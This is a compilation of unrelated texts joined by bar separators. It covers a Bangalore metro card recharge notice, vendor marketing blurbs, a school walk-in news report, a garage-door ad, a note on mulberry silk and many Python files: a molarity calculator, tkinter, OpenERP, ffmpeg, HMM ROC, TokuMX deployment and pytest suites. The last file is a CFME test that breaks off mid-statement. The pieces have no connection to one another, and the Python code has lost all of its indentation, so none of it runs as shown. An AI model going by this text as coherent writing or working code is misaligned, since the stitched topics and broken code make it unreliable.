The threshold limit is the balance amount (on the Namma Metro Transit Chip) at which the auto recharge instruction will be executed automatically. The threshold limit is Rs. 100 i.e. when the balance on the Namma Metro Transit Chip drops below Rs. 100, the auto recharge of Rs. 200 will be credited to the Namma Metro Transit Chip after automatic deduction from the Bank Account.
|
'''
@author: Thomas
'''
# M = moles solute / liters
def calculateMolarity():
molesSolute = float(raw_input('How many moles of the solute do you have?' ))
litersSolvent = float(raw_input('How many liters of the solvent do you have? '))
return float(molesSolute) / float(litersSolvent)
def calculateLiters():
molarity = float(raw_input('What is the molarity of the solution? '))
molesSolute = float(raw_input('How many moles are there dissolved in the solute? '))
return molesSolute / molarity
def calculateMoles():
molarity = int(raw_input('What is the molarity of the solution? '))
litersSolvent = float(raw_input('How many liters of the solvent do you have? '))
molesSolute = molarity * litersSolvent
return molesSolute
def setBool(a):
if a.lower() == 'y':
return True
else:
return False
def typeOfProblem():
molesCheck = raw_input('Do you know the amount of moles in the solution?(y/n) ')
litersCheck = raw_input('Do you know the amount of liters in the solution?(y/n) ')
molesCheck = setBool(molesCheck)
litersCheck = setBool(litersCheck)
if molesCheck and litersCheck:
print "M = " + str(calculateMolarity())
elif molesCheck and not litersCheck:
print str(calculateLiters()) + " L"
else:
print str(calculateMoles()) + " mol"
if __name__ == "__main__":
while True:
typeOfProblem()
option = raw_input('Do you need to solve another problem?(y/n) ')
if option.lower() == "y":
continue
else:
break
|
Operational business decisions are high-volume transactions that are repeated many times a day. They have high potential for automation and exert a strong leverage effect on efficiency. ACTICO Platform enables companies to implement agile services and applications to automate decisions or improve human decision-making.
Operational decisions are omnipresent – whether it’s evaluating risks, recommending products, calculating prices or controlling business processes. Digital business is heavily decision-centric and requires companies to make even the most complex of decisions instantly, transparently and consistently across all channels. ACTICO Platform enables companies to implement powerful digital decisioning services and applications. Whether it’s fully automated decisions based on AI and rules or workflow-based case-by-case decisions – ACTICO Platform ensures your decisions are smart, precise and traceable.
Business decisions need to be clear, accurate and adaptable. ACTICO Platform provides users with a drag-&-drop editor to create DMN decision models, define business rules and embed machine learning models wherever it makes sense. This low-code development approach brings more autonomy to business users and enables them to adapt quickly to change requirements.
ACTICO’s digital decisioning platform uses AI to generate data-driven insights and apply them directly to operational decision-making. Powerful machine learning technology and advanced algorithms ensure accurate and rapid results. The trained ML models can be graphically embedded into decision and rule models. This visual approach offers maximum transparency, control and agility.
With ACTICO Platform, companies can automatically make decisions in any business process, application or channel. Decisions can be provided as reusable web services that can be consumed by any system. Changes are possible at any time without programming and without having to wait for the next IT release. ACTICO’s decision engine can also be integrated directly into applications to meet the most demanding of performance requirements.
Not all decisions can be fully automated. Some decisions require additional information or human judgement. ACTICO Platform enables companies to implement workflow-based web applications for case-by-case decision making. ACTICO’s integrated development approach ensures that each aspect of the web application can be changed quickly whenever needed.
Decisions are a key lever for profitability and set companies apart from the competition. This allows businesses to implement individual applications that automatically make decisions based on the next best action.
With the centralized digital decisioning approach, companies implement a "single point of truth". This is where decisions are consistently managed, improved and made available as reusable decision services across all IT systems.
Digital decisioning decouples operational decisions from processes and applications. This means it is possible to make changes to decision-making in the blink of an eye – without coding and independent of IT release cycles.
Central decision services take agility and consistency to a new level.
Our customers have built and implemented numerous applications based on our decision management software – Learn more!
UBS Hong Kong checks up to 100,000 transactions per minute. This major bank implemented its powerful compliance application in the space of just 6 months. Now it is perfectly placed to adapt to new requirements as needed.
In today’s digital world, customer requirements change rapidly in accordance with their current situation. ING relies on ACTICO Platform to create personalized customer communications that reflect this context.
Bajaj Finance uses ACTICO software as its central credit decisioning platform. The software is seamlessly integrated with surrounding systems and empowers business users to take ownership of business logic.
Discover ACTICO Platform and get started with digital decisioning.
|
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from os.path import expanduser
from propresenterconverter import propresenterconverter
class directoryconversiongui:
def __init__(self):
# Create the gui.
self.window = Tk()
self.window.title("Directory Converter")
# Set the variables.
self.inputdirectory = StringVar(value="")
self.outputdirectory = StringVar(value="")
# Add the variables.
self.mainframe = ttk.Frame(self.window, padding="3 3 12 12")
self.mainframe.grid(column=0, row=0, sticky=(N, W, E, S))
self.mainframe.columnconfigure(0, weight=1)
self.mainframe.rowconfigure(0, weight=1)
self.inputdirbutton = ttk.Button(self.mainframe, text="Input Directory", command=self.inputdirbutton_click).\
grid(column=1, row=1, sticky=(W, E))
self.outputdirbutton = ttk.Button(self.mainframe, text="Output Directory", command=self.outputdirbutton_click).\
grid(column=1, row=2, sticky=(W, E))
self.processbutton = ttk.Button(self.mainframe, text="Convert!", command=self.processbutton_click).\
grid(column=1, row=3, sticky=(W, E))
self.inputdirlabel = ttk.Label(self.mainframe, textvariable=self.inputdirectory).grid(column=2, columnspan=2,
row=1, sticky=(W, E))
self.outputdirlabel = ttk.Label(self.mainframe, textvariable=self.outputdirectory).grid(column=2, columnspan=2,
row=2, sticky=(W, E))
# Minimum width for the label.
self.mainframe.columnconfigure(2, minsize=200)
# Options for opening a directory.
self.dir_opt = options = {}
options['initialdir'] = expanduser("~")
options['mustexist'] = False
options['parent'] = self.mainframe
options['title'] = 'Choose Folder'
def inputdirbutton_click(self):
# Show the folder choice dialog.
self.dir_opt['title'] = 'Choose Input Directory'
inputdir = filedialog.askdirectory(**self.dir_opt)
if inputdir is None:
inputdir = ""
self.inputdirectory.set(inputdir)
self.mainframe.update_idletasks()
def outputdirbutton_click(self):
# Show the folder choice dialog.
self.dir_opt['title'] = 'Choose Input Directory'
outputdir = filedialog.askdirectory(**self.dir_opt)
if outputdir is None:
outputdir = ""
self.outputdirectory.set(outputdir)
self.mainframe.update_idletasks()
def processbutton_click(self):
# TODO - Run the conversion code with the appropriate arguments.
ppconv = propresenterconverter(arglist=['-inputdir', self.inputdirectory.get(), '-outputdir',
self.outputdirectory.get()])
ppconv.convert()
return
def show(self):
# Start running the main loop.
self.window.mainloop()
|
Take an early stroll through the aisles of the largest KM event ever produced.
80-20 Software's newest technology, Darwin, represents over 20 man-years of research in neural networks and pattern matching technologies at Telstra Research and Development Labs. The result is a suite of tools specifically designed for content tracking and analysis, as well as expertise location, combined with a portal to manage corporate knowledge.
Ariel Performance Centered Systems will demonstrate "Day One System Performance" services for the retail and hospitality markets, which is a product of its a strategic business alliance with Cyntergy. These services will decrease software-support and implementation costs by making application user interfaces easier to learn and use. ROI on new system implementations is said to increase by decreasing training costs and time to competency.
Brainshark Enterprise is a communications application service provider that allows companies to self-author, deliver and manage on-demand multimedia business communications. Users can create and access recorded multimedia presentations anywhere, anytime to provide a scalable, flexible solution for knowledge transfer to multiple audiences.
Brightstation develops Web applications for business, including: InfoSort, which electronically reads documents and automatically assigns index categories by identifying key business topics, and Muscat, which finds information by understanding concepts underlying search requests using probabilistic methods to match concepts and ideas.
Computer Associates will introduce the Jasmine ii Portal, which uses 100% Java for scalability, interoperability, extensibility, platform independence and zero administration. It can be controlled from a central IT organization, thereby reducing administration costs and security risks. Jasmine ii can integrate with existing systems, automate common tasks and work with open directory services (e.g. LDAP).
Cerebyte will feature the latest enhancement of its Infinos software, a suite of 10 applications designed to apply the captured knowledge of business operations to generate more revenue and increase customer satisfaction without adding personnel. Cerebyte is also creating a business-to-business application service provider to enable 24/7 access to its software, road maps library and online services.
Comintell will show its Web technology to aggregate and deliver job-specific, in-context information and applications for particular user communities. The company was founded in 1999 by the former management team of Ericsson's business intelligence operations.
Communispace is a hosted ASP, Web-based environment that focuses on connecting people to people (not just people to documents) to achieve specific objectives, regardless of geographic, time and organizational barriers. A customizable service, Communispace offers brainstorming activities, threaded dialogue, conversation and collaboration, a research center, member profiles, multimedia exhibits, messaging and other features.
Correlate will offer a pre-release demonstration of Correlate 3.0, which turns the browser from a read-only environment into a collaborative, secured, XML-based information sharing platform and provides integration between the Web and other information sources. The Webmaster still controls publishing rights, but does not need to do manual work for documents because users can publish MS-Office documents directly from their desktops.
Portal B from Data Downlink offers a single point of access to internal and external information sources--configurable to a company's individual needs. The package integrates business Web searching, customized directories, premium content and indexed access to an enterprise's published material. It features a custom collection of more than 8,500 content-rich Internet sites, that have been hand-selected and reviewed.
InfoImage, a developer of decision portal software, will show interoperability of Microsoft Web Parts with its freedom 2 decision portal software at KMWorld 2000. Web Parts is a common technology that enables enterprise portals from different companies to talk to one another. InfoImage freedom 2 allows content and applications to be delivered as Web Parts to integrate directly with personalization and analysis features.
Work2gether is KM Technologies' intranet application designed for medium-sized companies (from 50 to 1 000 employees). Distributed through ASPs and ISPs, as well as through value-added resellers, Work2gether is not dependent on the company's language of work, position or geographical location.
MindCrest's knowledge portal, eWise, allows companies to leverage knowledge assets, particularly management of tacit knowledge, in a comprehensive manner. MindCrest also provides business and technical consulting and implementation services, integrated with a learning management system for KM implementation.
Knowledge Management 2.0 from Net Perceptions is designed to integrate applications and environments, such as browsers and other frequently used applications, into employees' existing work habits. New features include actionable intelligence, shared knowledge collections and personal knowledge networks.
Northern Light presents a growing number of B2B products and services ranging from enterprise accounts to customized business portals that provide seamless access from the user's desktop to the Web, relevant internal content, licensed third-party content and the Northern Light Special Collection.
Nua will launch Nua Publish, a Web-based publishing tool to enable enterprises to create, publish and scale better content online, to search more effectively online and to better manage its business information.
Peer3 will be offering e-learning and knowledge portal software and related services. The software is structured to reduce the time and cost of developing training courses and provide adaptive, personalized learning. It enables users to create and reuse "learning objects" that can be integrated into multiple training programs with minimal effort.
Semio will demonstrate Taxonomy 4.0, a complete service for building and maintaining customized, browseable categories for corporate portals and Internet sites. 4.0 features a new user interface, relevance ranking, Documentum access and multiple language support.
Sharing Technologies will present its flagship Knowledge Sharing software solution, Papirus for Domino. Papirus enables information to be shared easily and effectively. Papirus captures information, using the print function, from any Windows-based application (Excel, PeopleSoft, CAD/CAM, etc.) into a Notes document.
Silicon Space provides integrated e-business program management, including strategy, design, Web development, e-marketing and support of Internet, intranet and extranet solutions.
Smartlogik will unveil its latest generation of natural language search and categorization software for Internet and intranet applications. The Smartlogik software suite comprises searching, indexing, alerting, structuring, rule building and rule editing components. Used individually or in combination, the software is designed to increase the efficiency of knowledge retrieval.
Solutions-united.com will be launching the metaMarker Customer Content (CC) module, an "add-in" technology for use with metaMarker, its core technology platform, in CRM solutions. MetaMarker CC 1.0, features an expanded metadata framework, descriptive features, additional situation or use aspects and the Meta-Multiplier engine.
Sopheon presents modular software products designed to manage and leverage the knowledge life cycle for e-business from creation and capture to publishing via a variety of means, including portals, the Internet and alternative devices. The components can be selected for individual capability or delivered as a complete solution to fit organization requirements. The components include Sopheon Modeler, Terms, Composer, Publisher and Agents.
Synergistics will be previewing Authoriti, its new business portal that enables companies to develop knowledge communities. Authoriti manages enterprise knowledge and content and integrates it with relevant external information.
Tacit Knowledge Systems will showcase KnowledgeMail, an automatic discovery and exchange knowledge asset. KnowledgeMail provides the entire enterprise access to public, private and tacit knowledge while preserving user control and privacy at all times.
Thinkmap will announce the launch of Thinkmap Studio, a platform for creating interfaces for displaying, animating and navigating complex and interconnected information. In conjunction with the Thinkmap Studio launch, the company will announce several key strategic partnerships and showcase the latest knowledge management applications it powers.
VisionCompass is an international supplier of collaborative enterprise management software that enables organizations to implement and manage complex, interrelated business objectives. The Web-enabled, client-server software system features collaboration, communication, tracking, analysis and business intelligence functionality for organizations to deliver a set of business initiatives at all organizational levels.
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import osv
class res_company(osv.osv):
_inherit = "res.company"
_description = 'Company'
def _get_default_ad(self, addresses):
name = email = phone = city = post_code = address = country_code = ""
for ads in addresses:
if ads.type == 'default':
city = ads.city or ""
post_code = ads.zip or ""
if ads.street:
address = ads.street or ""
if ads.street2:
address += " " + ads.street2
if ads.country_id:
country_code = ads.country_id and ads.country_id.code or ""
name = ads.name or ""
email = ads.email or ""
phone = ads.phone or ""
return name, email, phone, city, post_code, address, country_code
res_company()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
We are glad to announce the launch of new usb pd 30W.
You can distribute energy wIth USB power delivery to multiple devices.
For smart phone, tablet, and for compact electronic accessories which has usb Type-C port.
|
'''
import sys
sys.path.append('..')
'''
from master_utils import *
import numpy as np
import os
import MySQLdb
from lda import LDA
from sklearn.decomposition import LatentDirichletAllocation
import datetime
import lda_t1
class BugEvent:
def __init__(self, start, end, topic, id, final):
self.start_date = start
self.end_date = end
self.bug_id = id
self.final_fixer = final
class TossingItem:
def __init__(self, time, user):
self.sq_timestamp = time
self.sq_user = user
self.time_passed = 0 #in seconds
def ComputeTime(self, prev_tossing):
time_n = datetime.datetime.fromtimestamp(float(self.sq_timestamp))
time_p = datetime.datetime.fromtimestamp(float(prev_tossing.sq_timestamp))
length = time_n - time_p
self.time_passed = length.total_seconds()
def __str__(self):
s = self.sq_timestamp + '##' + self.sq_user + '##' + str(self.time_passed) + '#;;#'
return s
|
This year we celebrate Halloween with ‘Deadly Blessing’ our first film to kick off the week.
A young woman’s fiancee is murdered and is pursued by unknown forces. She suspects that the strange religious cult he was a member of, the Hittites, is to blame.
Tags: deadly blessings, horror, and wes craven.
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Creates a .tar.gz file containing an HTML treemap displaying the codesize.
Requires docker to be installed.
Example usage:
python make_treemap.py $SKIA_ROOT/out/Release/skottie_tool /tmp/size
"""
import os
import subprocess
import sys
import tempfile
DOCKER_IMAGE = 'gcr.io/skia-public/binary-size:v1'
DOCKER_SCRIPT = '/opt/binary_size/src/run_binary_size_analysis.py'
def main():
input_file = sys.argv[1]
out_dir = sys.argv[2]
input_base = os.path.basename(input_file)
input_dir = os.path.dirname(input_file)
temp_out = tempfile.mkdtemp('treemap')
subprocess.check_call(['docker', 'run', '--volume', '%s:/IN' % input_dir,
'--volume', '%s:/OUT' % temp_out,
DOCKER_IMAGE, DOCKER_SCRIPT,
'--library', '/IN/%s' % input_base,
'--destdir', '/OUT'])
subprocess.check_call(['tar', '--directory=%s' % temp_out, '-zcf',
'%s/%s_tree.tar.gz' % (out_dir, input_base),
'.'])
if __name__ == '__main__':
main()
|
One month after the tragic Parkland shooting, students at Grand Haven and nationwide continued to foster conversation about school safety, bullying and guns while also honoring the 17 lives lost with walk-ins and walkouts.
Organized by freshman Lexi Tater, junior Faith Stevens, sophomore Jackson Schulte and junior Katie Pease with the help of the administration, a short slide show was presented in classes and then students were allowed to walk to the gym to participate in a moment of silence. The presentation stated that the goal of the walk-in was to remember the Parkland shooting as well as encourage students to be more aware of bullying and importance of a secure building.
The four student organizers give a small speech before the moment of silence in the field house.
“I feel like it went super well, I’m really glad everyone came and supported each other,” Pease said.
According to the Grand Haven twitter, about 1,000 students were in attendance in the field house.
While the event inside occurred, around 100 students stood outside by the flagpoles in silence, also in remembrance of the Parkland victims.
Some students chose to walk out because of the structured organization of the walk-in, stating that unity with the rest of the nation is important.
Safety was the main factor that lead the organizers to choose a walk-in over a walkout. According to Tater and Principal Tracy Wilson, dangers with cars driving in the parking lot, a lack of control of students and the fear of a potential copy-cat drove the moment of remembrance from outside to in.
The organizers also stated that they wanted to reflect on the tragedy by focusing more on respecting one another and the responsibility of students to close doors and enter through the main office instead of gun control.
“I understand that it’s not what the rest of the country is doing but we wanted to give the students an option that wasn’t political,” Pease said.
Another concern surrounding the walk-out was attendance, some speculating that students would exit the school and leave campus, using the event to get out of class. However, students that participated outside say that the walkout was orderly and no one left school grounds.
Despite the students being split on both their end goals and their method of spreading awareness, both groups were praised by administration for being respectful and active.
|
# Copyright (c) 2016-2018 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import os
import pytest
import sys
import fuzzinator
from common_call import blinesep, resources_dir
@pytest.mark.parametrize('command, cwd, env, no_exit_code, test, exp', [
('%s %s --print-args {test}' % (sys.executable, os.path.join(resources_dir, 'mock_tool.py')), None, None, None, 'foo', fuzzinator.call.NonIssue({'stdout': b'foo' + blinesep, 'stderr': b'', 'exit_code': 0})),
('%s %s --print-args --exit-code 1 {test}' % (sys.executable, os.path.join(resources_dir, 'mock_tool.py')), None, None, None, 'foo', {'stdout': b'foo' + blinesep, 'stderr': b'', 'exit_code': 1}),
('%s %s --print-args --to-stderr --exit-code 1 {test}' % (sys.executable, os.path.join(resources_dir, 'mock_tool.py')), None, None, None, 'foo', {'stdout': b'', 'stderr': b'foo' + blinesep, 'exit_code': 1}),
('%s %s --print-args --exit-code 1 {test}' % (sys.executable, os.path.join('.', 'mock_tool.py')), resources_dir, None, None, 'foo', {'stdout': b'foo' + blinesep, 'stderr': b'', 'exit_code': 1}),
('%s %s --print-env BAR --print-args --exit-code 1 {test}' % (sys.executable, os.path.join('.', 'mock_tool.py')), resources_dir, '{"BAR": "baz"}', None, 'foo', {'stdout': b'foo' + blinesep + b'baz' + blinesep, 'stderr': b'', 'exit_code': 1}),
('%s %s --print-args --exit-code 0 {test}' % (sys.executable, os.path.join(resources_dir, 'mock_tool.py')), None, None, 'True', 'foo', {'stdout': b'foo' + blinesep, 'stderr': b'', 'exit_code': 0}),
])
def test_subprocess_call(command, cwd, env, no_exit_code, test, exp):
assert fuzzinator.call.SubprocessCall(command, cwd=cwd, env=env, no_exit_code=no_exit_code, test=test) == exp
|
Seeking specialists for garage door weatherstripping in Abbotsford, British Columbia? You can always contact our local company. We are here to sort out such concerns and handle weather seal problems. When yours get torn or worn, call us to replace them. Equipped well and experienced with all types of weather strips, our pros can replace yours with accuracy. We are careful when we remove the existing seals and accurate when we install the new ones. No matter which door you have and which astragal you want, leave such services to us. Our pros at Garage Doors Abbotsford are skilled and committed.
With correct garage door weatherstripping installation, you get all the benefits seals offer and save money. Leave the service to our experts. We have been installing weather seals on all garage doors in Abbotsford for a long time. Our techs are familiar with all types, brands, and styles. Whether you want to install a retainer or a conventional rubber astragal, we are here to offer advice and the required service.
Why is it important to install weather seals correctly? Weatherstripping garage door bottom, side, and top sides is the ultimate solution for enhance indoor insulation. With the weather seal properly installed, you weatherize your garage and thus protect it from the cold air drafts in the winter and hot waves in the summer. You also avoid unwanted visitors, like insects and rain water.
With experience in garage door weatherstripping repair, we can assure you that the seals also protect the door. They provide the necessary layer to protect the material when the door is closed down. The seals cover the gap between the door and the jamb and enable the door to close and move well. So trust us to fix them up. When they are worn, they must be replaced quickly. And our company guarantees expert service in a timely and affordable fashion.
Don’t hesitate to contact us for our quotes or to set an appointment for garage door weatherstripping Abbotsford service. We will be glad to offer assistance.
|
import re
import six
from smartfields.processors.base import ExternalFileProcessor
from smartfields.utils import ProcessingError
from smartfields.processors.mixin import CloudExternalFileProcessorMixin
__all__ = [
'FFMPEGProcessor', 'CloudFFMEGPRocessor'
]
class FFMPEGProcessor(ExternalFileProcessor):
duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
progress_re = re.compile(r'time=(?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
error_re = re.compile(r'Invalid data found when processing input')
cmd_template = "ffmpeg -i {input} -y -codec:v {vcodec} -b:v {vbitrate} " \
"-maxrate {maxrate} -bufsize {bufsize} -vf " \
"scale={width}:{height} -threads {threads} -c:a {acodec} {output}"
def stdout_handler(self, line, duration=None):
if duration is None:
duration_time = self.duration_re.search(line)
if duration_time:
duration = self.timedict_to_seconds(duration_time.groupdict())
elif duration != 0:
current_time = self.progress_re.search(line)
if current_time:
seconds = self.timedict_to_seconds(current_time.groupdict())
progress = float(seconds)/duration
progress = progress if progress < 1 else 0.99
self.set_progress(progress)
elif self.error_re.search(line):
raise ProcessingError("Invalid video file or unknown video format.")
return (duration,)
def timedict_to_seconds(self, timedict):
seconds = 0
for key, t in six.iteritems(timedict):
if key == 'seconds':
seconds+= int(t)
elif key == 'minutes':
seconds+= int(t)*60
elif key == 'hours':
seconds+= int(t)*3600
return seconds
class CloudFFMEGPRocessor(CloudExternalFileProcessorMixin, FFMPEGProcessor):
pass
|
Mulberry silks create a beautiful sheen when laid on wool in your wet felting. They can also be used for you needle felting projects.
Mulberry Silk is created by feeding mulberry leaves to domesticated caterpillars (Bombyx Mori) .
These in turn produce cocoons consisting of pure white silk fibres.
In China, the commercial silk industry is underpinned by millions of small farmers and individual families’ handfeeding mulberry leaves to these caterpillars in boxes in their homes. They then sell these cocoons to the silk manufacturers.
|
#!/usr/bin/env python
import sys, math
# added prent directory to import path
sys.path.append("..")
import mallet.viterbi as viterbi
import mallet.input.sequence_parser as seq_parser
import mallet.input.tgf_parser as tgf_parser
import mallet.safe_math as safe_math
STEPS = 100
def frange(start, end, step):
end += step # HACK: prevent floating point errors in end
current = start
while current <= end:
yield current
current += step
def float_floor(value, decimals = 1):
value = value*(10**decimals)
return math.floor(value)/(10**decimals)
def float_ceil(value, decimals = 1):
value = value*(10**decimals)
return math.ceil(value)/(10**decimals)
def evaluate_alignment(alignment):
return (alignment, alignment.state_path.sequence[50] == "*")
def accuracy_metrics(evaluated_alignments, threshold):
tp, tn, fp, fn = (0,0,0,0)
for alignment,is_correct in evaluated_alignments:
if alignment.score >= threshold:
if is_correct:
tp += 1
else:
fp += 1
else:
if is_correct:
fn += 1
else:
tn += 1
return (tp, tn, fp, fn)
def print_roc_data_in_tsv(roc_data):
print "score\ttpr\tfpr\tppv\ttp\ttn\tfp\tfn"
for score,metrics in sorted(roc_data.items()):
print "{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}".format(score, *metrics)
hmm = tgf_parser.parse(sys.argv[1])
sequences = seq_parser.parse(sys.argv[2])
alignments = viterbi.viterbi_all(hmm, sequences)
evaluated_alignments = map(evaluate_alignment, alignments)
max_score = max(alignments, key = lambda align: align.score).score
min_score = min(alignments, key = lambda align: align.score).score
roc_data = {}
step_size = (max_score - min_score)/STEPS
scores_iterator = frange(float_floor(min_score), float_ceil(max_score), step_size)
for score in scores_iterator:
tp, tn, fp, fn = accuracy_metrics(evaluated_alignments, score)
tpr = safe_math.div(float(tp), float(tp+fn))
fpr = safe_math.div(float(fp), float(fp+tn))
ppv = safe_math.div(float(tp), float(tp+fp))
roc_data[score] = (tpr, fpr, ppv, tp, tn, fp, fn)
print_roc_data_in_tsv(roc_data)
|
HAPPY NATIONAL SUPERHERO DAY ! !
"I HAVE THE HIGH GROUND!"
"THAT WIZARD IS JUST A CRAZY OLD MAN"
TUESDAY COSPLAY: TEEN TITANS GO!
TMNT & USAGI YOJIMBO REUNITE!!
HOW LONG ARE JUGGERNAUT'S LEGS?????
ANYONE GOING TO STAR WARS CELEBRATION 2017 ? ?
HAPPY 75TH BIRTHDAY, LASSO OF TRUTH ! !
|
#!/usr/bin/python
#
# python script that deploys and runs tokumx
# arg: hostname (start|stop)
#
# NOTE
# TokuMX will not run with transparent huge pages enabled.
# To disable:
# (echo never > /sys/kernel/mm/transparent_hugepage/enabled)
import subprocess
import os
import sys
import json
import shutil
import re
import expsystem as es
mongos_port = 27017
class TokumxServer:
def __init__(self, param, host, script_home):
self.param = param
self.host = host
self.dir = es.DataRoot(param).dir('tokumx-' + es.getuser())
self.mongobin = param.get('tokumx_bin')
if (self.mongobin is None or self.mongobin == ''):
self.mongobin = os.path.join(os.path.dirname(script_home),
'tokumx', 'bin')
def install(self):
es.cleandir(self.dir)
def start(self, install = True):
if (install):
self.install()
slog = es.SysLog('tokumx')
slog.rotate(10)
subprocess.check_call("{0} --fork --dbpath {1} --logpath {2}".format(
os.path.join(self.mongobin, 'mongod'), self.dir, slog.getpath()),
shell=True)
def stop(self):
subprocess.call([os.path.join(self.mongobin, 'mongod'), '--shutdown',
'--dbpath', self.dir])
data = json.load(sys.stdin)
if len(sys.argv) > 2:
cmd = sys.argv[2]
elif len(sys.argv) > 1:
cmd = sys.argv[1]
else:
cmd = 'start'
sd = es.SysDirs()
server = TokumxServer(data, host = sys.argv[1], script_home = sd.script_home)
if (cmd == 'stop'):
server.stop()
else:
server.start()
|
For companies in the biotech or pharmaceutical industries, managed digital and I.T. services are critical to success. Effective marketing for such businesses needs to capture your company’s voice while communicating the often complex services and products you provide. On top of that, you must ensure that your network performs as optimally as possible while keeping sensitive data secure.
1SEO I.T. Support & Digital Marketing can provide you with comprehensive digital solutions that help you build your brand, safeguard your data, generate leads, and much more. Our knowledgeable teams will ensure that your company is primed for success and protected from digital threats. With 1SEO, you have everything you need to optimize your digital presence and secure your company’s most important information.
In the pharmaceutical and biotech industries, digital marketing can make or break both individual products and entire companies. Because research and development can be so costly, effective marketing becomes more essential than ever. Our talented teams remain current on the latest developments in the marketing industry to make sure that your company can benefit from the most cutting-edge marketing techniques and technologies.
We implement PPC campaigns, manage social media accounts, perform search engine optimization, design custom websites, and do anything else in our power to help your company grow. With our services, you can, promote new products and services, expand your customer base, and much more. We tailor our marketing services to your business objectives so that we can help you achieve the results you want.
You want your business to be one of the top results when people are looking for your goods or services, and search engine optimization does just that. An effective SEO strategy will include an analytical approach to marketing. We utilize sophisticated industry tools and software, all to drive more traffic and leads to your site.
This marketing method yields results by reaching key targeting demographics through meticulous market research. Not only can a well-run PPC campaign allow you to attract potential customers looking for your services or products, but can work within your budget and inform other forms of marketing.
Through the use of social media campaigns, we can help you engage with your target demographic and use them to generate leads for your business. Utilizing compelling posts, we’ll not only provide interesting content for your audience on subjects they’re passionate about, but also offer them something of value they can share with others.
You need a website that’s fast, well-designed, and takes the end user’s experience into consideration. Not only can we provide your business with a custom-built and beautifully-designed website, but it’ll also be responsive, mobile-friendly, and easy to use.
Your company depends on efficient technology more than most. To achieve maximum productivity, your company needs an expert networking solution. Further, your data is your most valuable asset. Loss or theft of this crucial information can be catastrophic. Managed I.T. solutions for your biotech company from 1SEO can provide you with the security and optimization your company needs to perform at its highest potential.
Our I.T. specialists will implement every measure necessary to ensure the safety and effectiveness of your company.
Ready to make your company safer and more efficient than ever before? Call us at 215-946-1046 to schedule a free, one-hour consultation.
|
# -*- coding: utf-8 -*-
import fauxfactory
import pytest
import traceback
from cfme.configure.access_control import User, Group, Role, Tenant, Project
from utils import error
import cfme.fixtures.pytest_selenium as sel
from cfme import test_requirements
from cfme.base.credential import Credential
from cfme.automate.explorer import AutomateExplorer # NOQA
from cfme.base import Server
from cfme.control.explorer import ControlExplorer # NOQA
from cfme.exceptions import OptionNotAvailable
from cfme.common.provider import base_types
from cfme.infrastructure import virtual_machines as vms
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from cfme.services.myservice import MyService
from cfme.web_ui import flash, Table, InfoBlock, toolbar as tb
from cfme.configure import tasks
from fixtures.provider import setup_one_or_skip
from utils.appliance.implementations.ui import navigate_to
from utils.blockers import BZ
from utils.log import logger
from utils.providers import ProviderFilter
from utils.update import update
from utils import version
records_table = Table("//div[@id='main_div']//table")
usergrp = Group(description='EvmGroup-user')
group_table = Table("//div[@id='main_div']//table")
pytestmark = test_requirements.rbac
@pytest.fixture(scope='module')
def a_provider(request):
prov_filter = ProviderFilter(classes=[VMwareProvider])
return setup_one_or_skip(request, filters=[prov_filter])
def new_credential():
return Credential(principal='uid' + fauxfactory.gen_alphanumeric(), secret='redhat')
def new_user(group=usergrp):
return User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=new_credential(),
email='xyz@redhat.com',
group=group,
cost_center='Workload',
value_assign='Database')
def new_group(role='EvmRole-approver'):
return Group(
description='grp' + fauxfactory.gen_alphanumeric(),
role=role)
def new_role():
return Role(
name='rol' + fauxfactory.gen_alphanumeric(),
vm_restriction='None')
def get_tag():
return InfoBlock('Smart Management', 'My Company Tags').text
@pytest.fixture(scope='function')
def check_item_visibility(tag):
def _check_item_visibility(item, user_restricted):
category_name = ' '.join((tag.category.display_name, '*'))
item.edit_tags(category_name, tag.display_name)
with user_restricted:
assert item.exists
item.remove_tag(category_name, tag.display_name)
with user_restricted:
assert not item.exists
return _check_item_visibility
# User test cases
@pytest.mark.tier(2)
def test_user_crud():
user = new_user()
user.create()
with update(user):
user.name = user.name + "edited"
copied_user = user.copy()
copied_user.delete()
user.delete()
# @pytest.mark.meta(blockers=[1035399]) # work around instead of skip
@pytest.mark.tier(2)
def test_user_login():
user = new_user()
user.create()
try:
with user:
navigate_to(Server, 'Dashboard')
finally:
user.appliance.server.login_admin()
@pytest.mark.tier(3)
def test_user_duplicate_name(appliance):
region = appliance.server_region
nu = new_user()
nu.create()
msg = version.pick({
version.LOWEST: "Userid has already been taken",
'5.8': "Userid is not unique within region {}".format(region)
})
with error.expected(msg):
nu.create()
group_user = Group("EvmGroup-user")
@pytest.mark.tier(3)
def test_username_required_error_validation():
user = User(
name="",
credential=new_credential(),
email='xyz@redhat.com',
group=group_user)
with error.expected("Name can't be blank"):
user.create()
@pytest.mark.tier(3)
def test_userid_required_error_validation():
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=Credential(principal='', secret='redhat'),
email='xyz@redhat.com',
group=group_user)
with error.expected("Userid can't be blank"):
user.create()
@pytest.mark.tier(3)
def test_user_password_required_error_validation():
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=Credential(principal='uid' + fauxfactory.gen_alphanumeric(), secret=None),
